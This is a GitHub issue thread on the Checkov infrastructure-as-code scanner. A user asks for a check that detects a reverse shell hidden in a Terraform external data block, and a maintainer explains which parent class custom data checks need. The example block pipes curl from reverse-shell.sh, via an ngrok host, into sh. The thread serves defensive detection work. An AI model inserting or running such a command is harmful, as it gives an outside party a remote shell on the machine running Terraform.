search

bridgecrewio / checkov

Prevent cloud misconfigurations and find vulnerabilities during build-time in infrastructure as code, container images and open source packages with Checkov by Bridgecrew.
https://www.checkov.io/
Apache License 2.0
7.09k stars 1.11k forks source link

Unable to find possible reverse shell #5727

Closed GoliTech closed 11 months ago

GoliTech commented 11 months ago

Describe the issue if there is a malicious code block inside the configuration, checkov could not find it

Examples data "external" "example" { program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] }

Version (please complete the following information):

Additional context I even created a check but did not work

from checkov.common.models.enums import CheckResult, CheckCategories from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck from enum import Enum

class CheckCategories(Enum): SECURITY = "SECURITY"

class CustomCheck(BaseResourceCheck): def init(self): name = "Detect potential reverse shell in external data" id = "CUSTOM_REVERSE_SHELL_CHECK" supported_resources = ["data"] categories = [CheckCategories.SECURITY] super().init(name=name, id=id, categories=categories, supported_resources=supported_resources)

def scan_resource_conf(self, conf, entity_type):
    if "external" in conf and "example" in conf["external"]:
        program = conf["external"]["example"].get("program")
        if program and any("sh" in part for part in program) and "curl" in program and "| sh" in " ".join(program):
            return CheckResult.FAILED, "Potential reverse shell detected in external data"
    return CheckResult.PASSED, ""

check_id = CustomCheck()

gruebel commented 11 months ago

hey @GoliTech thanks for reaching out.

I'm not sure, what exactly the question is, are you looking for a built-in check, which would find the issue or you want to create a custom check for it. In general we had a check, which looked for any external use, but it was too noisy and therefore removed it again. You should always be aware of anything running in an external data block, because can exfiltrate secrets, running malicious code, etc.

GoliTech commented 11 months ago

@gruebel thanks for the quick response That is true I am looking for a check to raise a flag for external, but there is no built in and I tried to implement my self, how ever after 2 days I still could not implement that, could u please help me? I even changed the scan function to:

class CustomCheck(BaseResourceCheck):

def __init__(self):

    name = "Detect potential reverse shell in external data"

    id = "CUSTOM_REVERSE_SHELL_CHECK"

    supported_resources = ['azurerm_managed_disk']

    categories = [CheckCategories.NETWORKING]

    super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)

def scan_resource_conf(self, conf):

    if 1 == 1:

        return CheckResult.FAILED, "Test condition 1 == 1 satisfied."

    else:

        return CheckResult.PASSED, ""

` just to see if the scanner works or not. it looks checkov does not find this 1==1 condition.

gruebel commented 11 months ago

gotcha, you did a small mistake, because data checks need to use a different parent class, here is an example https://github.com/bridgecrewio/checkov/blob/main/tests/terraform/checks/data/external/external_check/ExternalData.py depending on how complex your check, is could also write it as a YAML-based one, like here https://github.com/bridgecrewio/checkov/blob/main/tests/terraform/checks/data/external/external_check/ExternalData.py

GoliTech commented 11 months ago

thanks a lot for your help.